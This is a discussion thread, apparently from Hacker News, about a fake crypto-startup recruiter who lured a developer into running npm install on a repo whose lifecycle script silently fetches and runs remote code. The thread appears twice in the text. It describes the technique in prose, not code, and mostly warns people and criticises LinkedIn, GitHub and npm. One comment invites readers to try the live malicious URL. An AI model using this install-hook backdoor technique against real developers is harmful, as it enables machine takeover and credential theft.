> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
I'm bottom of the ladder but have seeing the option to do it for at least a year.
I have the same. The difference is, if you do email verification, you will "verified" status. If not, you can still add the company to your linkedin, just unverified, which is not a label.
[deleted]
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily envolves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Not that relying on this is a good idea.
Bwahaha, no it doesn’t.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostiloes, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
[flagged]
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. PNMPM and block one if the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
Edit: typos
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
> Friends don't let friends ise NPM
or linkedin
I don't have friends, therefore I must use LinkedIn to get a job. Hooray!
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being ran.
Bigger issue is giant, inscrutible dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
[deleted]
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
IYKYK
Things like this where a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I reported a fake costco website ad (cc harvester) to Google, their response was something along "we cannot verify the ad", go figure
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?
Bold strategy cotton, let's see if it pays off.
I recently went through an interview—o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
surprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
whilst reducing crime is an honorable objective, as we all know, increasing the wealth of tech billionaires must take priority.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
the main issue is that we lack a global '911'.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
> the main issue is that we lack a global '911'.
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
i used the same terminology as the parent, and i think we all know what is meant by it
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
you arent getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
I don’t know but the us kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be aced upon…
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not a insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
You are not wrong. They don't do this because they make money from the scammers.
>It would be trivial to eradicate them almost completely
Absolutely true, but droning their data centers might have some policy repercussions.
A majority of people would enthusiastically support drone strikes on scam callers and their infrastructure.
Yeah 100%. It's criminal that this is not already done.
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
They must have whitelisted the word Google. Very useful to scammers.
There is but the FBI is horrible at responding to cybercrime. They have IC3 but its basically useless. They arent going to help or even contact you if you report a crime to them.
The scammers are in a different whole uncooperative country.
Or they may be in this country, but uses proxies, virtual machines, hostings from uncooperative country.
Yes. But the perps are in North Korea.
[flagged]
> simply for being one of the last communist countries
Well, that plus their 50 nuclear warheads and continued ICBM development, amongst other things.
I read the other day they are making quite a turnaround in GDP by selling munitions to our enemies.
[deleted]
Have you seen the state of *gestures at everything*
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
[deleted]
yes this is a crime.
Cool let's hear your solution, you seem well versed on how infosec works.
This is uncomfortably close to a normal interview task now.
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.
The interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Oh, Microsoft.
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
They should have reported it for DMCA violation. It would be gone instantly.
They seem to using the same domain for multiple targets: reddit thread from 3 months ago:
Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
Nothing to do with nom itself. This sort of scam would have worked with many different technologies, even a Makefile.
> So far nothing has changed and the code is still up.
That sucks, but it seems to be par for the course, these days.
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
It's ok, the guy with glasses from the Daily Show said it's ok.
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice.
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
> Maybe Mac will finally get decent virtualization framework.
it already has, you can configure intellij to run npm commands in a Docker container.
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
Hoisted by their own petard vibes.
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
I was a victim of this attack on Friday. The interviewer had a russian / east European accent.
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
You can actually test it yourself. The actual URL is in the post and the website is still up.
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
This has nearly gotten me before, and I got lucky.
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
LinkedIn is a cesspool of scams now.
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Would highly recommend running any repo in an isolated environment like a vm
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Stay vigilant out there everyone.
> Such people are the worst of the worst of humanity.
I don't know. There's a plentiful supply of bad humans.
Anyone who preys on people who are desperate and hurting are certainly some of the worst though.
Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
It would have been game over for me.
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those don't value it.
- Don't stay complacent always innovate.
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
the entire internet is just phishing at this point
More reasons for me to dislike linked-in. I have an account. I hate it.
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
LinkedIn didn't even disavow people pretending to work for LinkedIn until someone had too much fun with it - https://chrisduffycomedy.com/blog/2016/11/2/6-months-as-the-...
That’s funny, thanks for that.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
https://www.theverge.com/news/771210/linkedin-recruiter-exec...
I'm bottom of the ladder but have seeing the option to do it for at least a year.
I have the same. The difference is, if you do email verification, you will "verified" status. If not, you can still add the company to your linkedin, just unverified, which is not a label.
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily envolves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Not that relying on this is a good idea.
Bwahaha, no it doesn’t.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostiloes, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
[flagged]
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. PNMPM and block one if the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
Edit: typos
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
They have some changes here in v12: https://github.blog/changelog/2026-06-09-upcoming-breaking-c...
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
> Friends don't let friends ise NPM
or linkedin
I don't have friends, therefore I must use LinkedIn to get a job. Hooray!
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being ran.
Bigger issue is giant, inscrutible dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
IYKYK
Things like this where a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I reported a fake costco website ad (cc harvester) to Google, their response was something along "we cannot verify the ad", go figure
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?
Bold strategy cotton, let's see if it pays off.
I recently went through an interview—o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
surprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
whilst reducing crime is an honorable objective, as we all know, increasing the wealth of tech billionaires must take priority.
https://www.ic3.gov
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
the main issue is that we lack a global '911'.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
> the main issue is that we lack a global '911'.
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
i used the same terminology as the parent, and i think we all know what is meant by it
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
you arent getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
I don’t know but the us kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be aced upon…
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not a insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
You are not wrong. They don't do this because they make money from the scammers.
I have posted about this before. See here: https://news.ycombinator.com/item?id=35191971
>It would be trivial to eradicate them almost completely
Absolutely true, but droning their data centers might have some policy repercussions.
A majority of people would enthusiastically support drone strikes on scam callers and their infrastructure.
Yeah 100%. It's criminal that this is not already done.
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
Saw Microsoft has a dedicated scam reporting page - guess it was damaging their brand https://reportfraud.microsoft.com/en-us
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
They must have whitelisted the word Google. Very useful to scammers.
There is but the FBI is horrible at responding to cybercrime. They have IC3 but its basically useless. They arent going to help or even contact you if you report a crime to them.
The scammers are in a different whole uncooperative country.
Or they may be in this country, but uses proxies, virtual machines, hostings from uncooperative country.
Yes. But the perps are in North Korea.
[flagged]
> simply for being one of the last communist countries
Well, that plus their 50 nuclear warheads and continued ICBM development, amongst other things.
I read the other day they are making quite a turnaround in GDP by selling munitions to our enemies.
Have you seen the state of *gestures at everything*
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
yes this is a crime.
Cool let's hear your solution, you seem well versed on how infosec works.
This is uncomfortably close to a normal interview task now.
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.
The interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Oh, Microsoft.
